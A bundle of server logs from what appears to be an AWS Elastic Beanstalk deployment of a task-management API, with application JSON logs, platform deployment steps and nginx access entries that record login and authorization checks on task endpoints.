Apr 13 02:46:17 ip-10-0-2-194 web[196666]: {"timestamp":"2026-04-13T02:46:17.174919254Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"27b0e2d0-71dc-4a75-ba3b-778b7a66e84b","userId":6,"path":"/api/tasks","method":"GET","status":200,"durationMs":31,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:49:16 ip-10-0-2-194 web[196666]: {"timestamp":"2026-04-13T02:49:16.893930711Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-AUTH-001","requestId":"phase7-5-8-login-1776048485","userId":26,"path":"/api/auth/login","method":"POST","status":200,"message":"مƒ­م‚°م‚¤مƒ³وˆگهٹں","email":"ph***@example.com"}
Apr 13 02:49:16 ip-10-0-2-194 web[196666]: {"timestamp":"2026-04-13T02:49:16.899511464Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"phase7-5-8-login-1776048485","path":"/api/auth/login","method":"POST","status":200,"durationMs":120,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:49:19 ip-10-0-2-194 web[196666]: {"timestamp":"2026-04-13T02:49:19.214257767Z","level":"WARN","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-AUTH-003","requestId":"phase7-5-8-invalid-1776048485","path":"/api/tasks","method":"GET","status":401,"message":"JWTو¤œè¨¼ه¤±و•—","safeMessage":"مƒˆمƒ¼م‚¯مƒ³مپŒن¸چو­£مپ§مپ™","errorCode":"ERR-AUTH-003","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:49:19 ip-10-0-2-194 web[196666]: {"timestamp":"2026-04-13T02:49:19.227100706Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"phase7-5-8-invalid-1776048485","path":"/api/tasks","method":"GET","status":401,"durationMs":13,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:49:20 ip-10-0-2-194 web[196666]: {"timestamp":"2026-04-13T02:49:20.566630222Z","level":"WARN","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-AUTH-006","requestId":"phase7-5-8-unauth-1776048485","path":"/api/tasks","method":"GET","status":401,"message":"وœھèھچè¨¼م‚¢م‚¯م‚»م‚¹","errorCode":"ERR-AUTH-001","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:49:20 ip-10-0-2-194 web[196666]: {"timestamp":"2026-04-13T02:49:20.568043721Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"phase7-5-8-unauth-1776048485","path":"/api/tasks","method":"GET","status":401,"durationMs":6,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}
Apr 13 02:49:50 ip-10-0-2-194 web[196666]: {"timestamp":"2026-04-13T02:49:50.549117797Z","level":"INFO","serviceName":"task-app","environment":"prod","version":"0.0.1-SNAPSHOT","eventId":"LOG-REQ-001","requestId":"phase7-5-8-tasks-1776048485","userId":26,"path":"/api/tasks","method":"GET","status":200,"durationMs":31,"message":"مƒھم‚¯م‚¨م‚¹مƒˆçµ‚ن؛†","ip":"240b:252:1cc4:f00:359a:65f7:91d9:8642"}


----------------------------------------
/var/log/eb-engine.log
----------------------------------------
2026/04/13 02:43:06.510151 [INFO] Purge old process...
2026/04/13 02:43:06.510190 [INFO] Running command: systemctl stop eb-app.target
2026/04/13 02:43:06.520072 [INFO] Running command: systemctl show -p ConsistsOf eb-app.target | cut -d= -f2
2026/04/13 02:43:06.531039 [INFO] web.service

2026/04/13 02:43:06.531061 [INFO] deregistering process: web
2026/04/13 02:43:06.531070 [INFO] Running command: systemctl show -p PartOf web.service
2026/04/13 02:43:06.542720 [INFO] Running command: systemctl is-active web.service
2026/04/13 02:43:06.550620 [INFO] Running command: systemctl disable web.service
2026/04/13 02:43:06.852299 [INFO] Removed "/etc/systemd/system/multi-user.target.wants/web.service".

2026/04/13 02:43:06.852477 [INFO] Running command: systemctl daemon-reload
2026/04/13 02:43:07.162202 [INFO] Running command: systemctl reset-failed
2026/04/13 02:43:07.171235 [INFO] Running command: systemctl is-active web.service
2026/04/13 02:43:07.179039 [INFO] Process web has been fully terminated
2026/04/13 02:43:07.179064 [INFO] All processes have been fully terminated
2026/04/13 02:43:07.179068 [INFO] Removing /var/app/current/ if it exists
2026/04/13 02:43:07.180389 [INFO] Renaming /var/app/staging/ to /var/app/current/
2026/04/13 02:43:07.180434 [INFO] Register application processes...
2026/04/13 02:43:07.180439 [INFO] Registering the proc: web

2026/04/13 02:43:07.180448 [INFO] Running command: systemctl show -p PartOf web.service
2026/04/13 02:43:07.193612 [INFO] Running command: systemctl daemon-reload
2026/04/13 02:43:07.484213 [INFO] Running command: systemctl reset-failed
2026/04/13 02:43:07.492814 [INFO] Running command: systemctl is-enabled eb-app.target
2026/04/13 02:43:07.501798 [INFO] Running command: systemctl enable eb-app.target
2026/04/13 02:43:07.773696 [INFO] Running command: systemctl start eb-app.target
2026/04/13 02:43:07.783267 [INFO] Running command: systemctl enable web.service
2026/04/13 02:43:08.012635 [INFO] Created symlink /etc/systemd/system/multi-user.target.wants/web.service â†’ /etc/systemd/system/web.service.

2026/04/13 02:43:08.012670 [INFO] Running command: systemctl show -p PartOf web.service
2026/04/13 02:43:08.023953 [INFO] Running command: systemctl is-active web.service
2026/04/13 02:43:08.031554 [INFO] Running command: systemctl start web.service
2026/04/13 02:43:10.250863 [INFO] Executing instruction: start X-Ray
2026/04/13 02:43:10.250891 [INFO] X-Ray is not enabled.
2026/04/13 02:43:10.250896 [INFO] Executing instruction: start proxy with new configuration
2026/04/13 02:43:10.250933 [INFO] Running command: /usr/sbin/nginx -t -c /var/proxy/staging/nginx/nginx.conf
2026/04/13 02:43:10.297459 [INFO] nginx: [warn] could not build optimal types_hash, you should increase either types_hash_max_size: 1024 or types_hash_bucket_size: 64; ignoring types_hash_bucket_size
nginx: the configuration file /var/proxy/staging/nginx/nginx.conf syntax is ok
nginx: configuration file /var/proxy/staging/nginx/nginx.conf test is successful

2026/04/13 02:43:10.297792 [INFO] Running command: cp -rp /var/proxy/staging/nginx/* /etc/nginx
2026/04/13 02:43:10.308902 [INFO] Running command: systemctl show -p PartOf nginx.service
2026/04/13 02:43:10.329114 [INFO] Running command: systemctl daemon-reload
2026/04/13 02:43:10.715387 [INFO] Running command: systemctl reset-failed
2026/04/13 02:43:10.728164 [INFO] Running command: systemctl show -p PartOf nginx.service
2026/04/13 02:43:10.747835 [INFO] Running command: systemctl is-active nginx.service
2026/04/13 02:43:10.761610 [INFO] Running command: systemctl start nginx.service
2026/04/13 02:43:10.996664 [INFO] Executing instruction: configureSqsd
2026/04/13 02:43:10.996685 [INFO] This is a web server environment instance, skip configure sqsd daemon ...
2026/04/13 02:43:10.996689 [INFO] Executing instruction: startSqsd
2026/04/13 02:43:10.996693 [INFO] This is a web server environment instance, skip start sqsd daemon ...
2026/04/13 02:43:10.996696 [INFO] Executing instruction: Track pids in healthd
2026/04/13 02:43:10.996700 [INFO] This is an enhanced health env...
2026/04/13 02:43:10.996714 [INFO] Running command: systemctl show -p ConsistsOf aws-eb.target | cut -d= -f2
2026/04/13 02:43:11.022719 [INFO] healthd.service cfn-hup.service amazon-cloudwatch-agent.service nginx.service

2026/04/13 02:43:11.022756 [INFO] Running command: systemctl show -p ConsistsOf eb-app.target | cut -d= -f2
2026/04/13 02:43:11.038602 [INFO] web.service

2026/04/13 02:43:11.038964 [INFO] Executing instruction: RunAppDeployPostDeployHooks
2026/04/13 02:43:11.038991 [INFO] No hooks found in .platform/hooks/postdeploy/, skipping
2026/04/13 02:43:11.038996 [INFO] Executing cleanup logic
2026/04/13 02:43:11.039126 [INFO] CommandService Response: {"status":"SUCCESS","api_version":"1.0","results":[{"status":"SUCCESS","msg":"Engine execution has succeeded.","returncode":0,"events":[{"msg":"Instance deployment used the commands in your 'Procfile' to initiate startup of your application.","timestamp":1776048177298,"severity":"INFO"},{"msg":"Instance deployment completed successfully.","timestamp":1776048191039,"severity":"INFO"}]}]}

2026/04/13 02:43:11.075158 [INFO] Platform Engine finished execution on command: app-deploy

2026/04/13 02:51:17.285677 [INFO] Starting...
2026/04/13 02:51:17.286354 [INFO] Starting EBPlatform-PlatformEngine
2026/04/13 02:51:17.286398 [INFO] reading event message file
2026/04/13 02:51:17.290003 [INFO] Engine received EB command cfn-hup-exec

2026/04/13 02:51:17.501353 [INFO] Running command: /opt/aws/bin/cfn-get-metadata -s arn:aws:cloudformation:ap-northeast-1:359429618625:stack/awseb-e-gvcyudrrcs-stack/458da7e0-33d8-11f1-a9bf-0e613096d381 -r AWSEBAutoScalingGroup --region ap-northeast-1
2026/04/13 02:51:17.864007 [INFO] Running command: /opt/aws/bin/cfn-get-metadata -s arn:aws:cloudformation:ap-northeast-1:359429618625:stack/awseb-e-gvcyudrrcs-stack/458da7e0-33d8-11f1-a9bf-0e613096d381 -r AWSEBBeanstalkMetadata --region ap-northeast-1
2026/04/13 02:51:18.186333 [INFO] checking whether command bundle-log is applicable to this instance...
2026/04/13 02:51:18.186355 [INFO] this command is applicable to the instance, thus instance should execute command
2026/04/13 02:51:18.186360 [INFO] Engine command: (bundle-log)

2026/04/13 02:51:18.187709 [INFO] Executing instruction: GetBundleLogs
2026/04/13 02:51:18.187720 [INFO] Bundle Logs...
2026/04/13 02:51:18.790548 [INFO] Executing cleanup logic
2026/04/13 02:51:18.790664 [INFO] CommandService Response: {"status":"SUCCESS","api_version":"1.0","results":[{"status":"SUCCESS","msg":"Engine execution has succeeded.","returncode":0,"events":[{"msg":"Instance deployment completed successfully.","timestamp":1776048678790,"severity":"INFO"}]}]}

2026/04/13 02:51:18.790722 [INFO] Platform Engine finished execution on command: bundle-log

2026/04/13 02:59:39.002972 [INFO] Starting...
2026/04/13 02:59:39.003038 [INFO] Starting EBPlatform-PlatformEngine
2026/04/13 02:59:39.003061 [INFO] reading event message file
2026/04/13 02:59:39.003466 [INFO] Engine received EB command cfn-hup-exec

2026/04/13 02:59:39.085836 [INFO] Running command: /opt/aws/bin/cfn-get-metadata -s arn:aws:cloudformation:ap-northeast-1:359429618625:stack/awseb-e-gvcyudrrcs-stack/458da7e0-33d8-11f1-a9bf-0e613096d381 -r AWSEBAutoScalingGroup --region ap-northeast-1
2026/04/13 02:59:39.390043 [INFO] Running command: /opt/aws/bin/cfn-get-metadata -s arn:aws:cloudformation:ap-northeast-1:359429618625:stack/awseb-e-gvcyudrrcs-stack/458da7e0-33d8-11f1-a9bf-0e613096d381 -r AWSEBBeanstalkMetadata --region ap-northeast-1
2026/04/13 02:59:39.702765 [INFO] checking whether command tail-log is applicable to this instance...
2026/04/13 02:59:39.702780 [INFO] this command is applicable to the instance, thus instance should execute command
2026/04/13 02:59:39.702785 [INFO] Engine command: (tail-log)

2026/04/13 02:59:39.702831 [INFO] Executing instruction: GetTailLogs
2026/04/13 02:59:39.702834 [INFO] Tail Logs...
2026/04/13 02:59:39.705295 [INFO] Running command: tail -n 100 /var/log/web.stdout.log
2026/04/13 02:59:39.708467 [INFO] Running command: tail -n 100 /var/log/eb-engine.log


----------------------------------------
/var/log/nginx/access.log
----------------------------------------
15.158.241.77 - - [13/Apr/2026:02:10:11 +0000] "POST /api/tasks HTTP/1.1" 201 291 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.77 - - [13/Apr/2026:02:10:12 +0000] "PUT /api/tasks/12 HTTP/1.1" 403 243 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:10:12 +0000] "DELETE /api/tasks/12 HTTP/1.1" 403 243 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:11:18 +0000] "POST /api/auth/register HTTP/1.1" 201 155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:11:18 +0000] "POST /api/auth/login HTTP/1.1" 200 348 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.102 - - [13/Apr/2026:02:11:18 +0000] "POST /api/auth/register HTTP/1.1" 201 155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:11:18 +0000] "POST /api/auth/login HTTP/1.1" 200 348 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.102 - - [13/Apr/2026:02:11:18 +0000] "POST /api/tasks HTTP/1.1" 201 329 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:11:19 +0000] "GET /api/tasks/13 HTTP/1.1" 403 252 "https://d3jotedl3xn7u4.cloudfront.net/tasks/13" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:11:19 +0000] "GET /api/tasks HTTP/1.1" 200 12 "https://d3jotedl3xn7u4.cloudfront.net/tasks/13" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:11:19 +0000] "GET /api/users HTTP/1.1" 200 1943 "https://d3jotedl3xn7u4.cloudfront.net/tasks/13" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:11:20 +0000] "GET /api/tasks/13 HTTP/1.1" 403 252 "https://d3jotedl3xn7u4.cloudfront.net/tasks/13/edit" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:11:21 +0000] "GET /api/tasks HTTP/1.1" 200 12 "https://d3jotedl3xn7u4.cloudfront.net/tasks/13/edit" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:11:21 +0000] "GET /api/users HTTP/1.1" 200 1943 "https://d3jotedl3xn7u4.cloudfront.net/tasks/13/edit" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.102 - - [13/Apr/2026:02:11:21 +0000] "PUT /api/tasks/13 HTTP/1.1" 403 243 "https://d3jotedl3xn7u4.cloudfront.net/tasks/13/edit" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.77 - - [13/Apr/2026:02:11:21 +0000] "GET /api/tasks HTTP/1.1" 200 12 "https://d3jotedl3xn7u4.cloudfront.net/tasks/13/edit" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:11:22 +0000] "GET /api/tasks/13 HTTP/1.1" 200 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.97 - - [13/Apr/2026:02:11:23 +0000] "GET /api/tasks HTTP/1.1" 200 12 "https://d3jotedl3xn7u4.cloudfront.net/tasks/13" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.102 - - [13/Apr/2026:02:11:23 +0000] "GET /api/tasks/13 HTTP/1.1" 403 252 "https://d3jotedl3xn7u4.cloudfront.net/tasks/13" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:11:23 +0000] "GET /api/users HTTP/1.1" 200 1943 "https://d3jotedl3xn7u4.cloudfront.net/tasks/13" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.77 - - [13/Apr/2026:02:11:23 +0000] "DELETE /api/tasks/13 HTTP/1.1" 403 243 "https://d3jotedl3xn7u4.cloudfront.net/tasks/13" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.97 - - [13/Apr/2026:02:11:23 +0000] "GET /api/tasks HTTP/1.1" 200 12 "https://d3jotedl3xn7u4.cloudfront.net/tasks/13" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:11:24 +0000] "GET /api/tasks/13 HTTP/1.1" 200 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.77 - - [13/Apr/2026:02:11:24 +0000] "DELETE /api/tasks/13 HTTP/1.1" 204 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:12:03 +0000] "POST /api/auth/register HTTP/1.1" 201 155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:12:03 +0000] "POST /api/auth/login HTTP/1.1" 200 348 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:12:04 +0000] "GET /api/tasks HTTP/1.1" 200 12 "https://d3jotedl3xn7u4.cloudfront.net/tasks/new" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:12:04 +0000] "GET /api/users HTTP/1.1" 200 2044 "https://d3jotedl3xn7u4.cloudfront.net/tasks/new" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:12:05 +0000] "GET /api/tasks HTTP/1.1" 200 12 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:12:05 +0000] "GET /api/users HTTP/1.1" 200 2044 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:12:06 +0000] "GET /api/users HTTP/1.1" 200 2044 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.102 - - [13/Apr/2026:02:12:06 +0000] "GET /api/tasks HTTP/1.1" 200 12 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:12:59 +0000] "POST /api/auth/register HTTP/1.1" 201 155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:12:59 +0000] "POST /api/auth/login HTTP/1.1" 200 348 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:13:01 +0000] "GET /api/users HTTP/1.1" 200 2145 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:13:01 +0000] "GET /api/tasks HTTP/1.1" 200 12 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:13:02 +0000] "GET /api/tasks HTTP/1.1" 401 216 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:13:02 +0000] "GET /api/users HTTP/1.1" 401 217 "https://d3jotedl3xn7u4.cloudfront.net/tasks" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:13:46 +0000] "POST /api/auth/login HTTP/1.1" 200 348 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:13:46 +0000] "DELETE /api/tasks/8 HTTP/1.1" 204 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:13:46 +0000] "POST /api/auth/login HTTP/1.1" 200 348 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.102 - - [13/Apr/2026:02:13:46 +0000] "DELETE /api/tasks/9 HTTP/1.1" 204 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.77 - - [13/Apr/2026:02:13:46 +0000] "POST /api/auth/login HTTP/1.1" 200 338 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:13:46 +0000] "DELETE /api/tasks/10 HTTP/1.1" 204 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.97 - - [13/Apr/2026:02:13:46 +0000] "POST /api/auth/login HTTP/1.1" 200 348 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:13:46 +0000] "DELETE /api/tasks/11 HTTP/1.1" 204 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:30:48 +0000] "POST /api/auth/register HTTP/1.1" 201 155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.69 - - [13/Apr/2026:02:30:48 +0000] "POST /api/auth/login HTTP/1.1" 200 348 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
15.158.241.109 - - [13/Apr/2026:02:30:48 +0000] "POST /api/auth/register HTTP/1.1" 201 155 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/146.0.0.0 Safari/537.36" "240b:252:1cc4:f00:359a:65f7:91d9:8642"
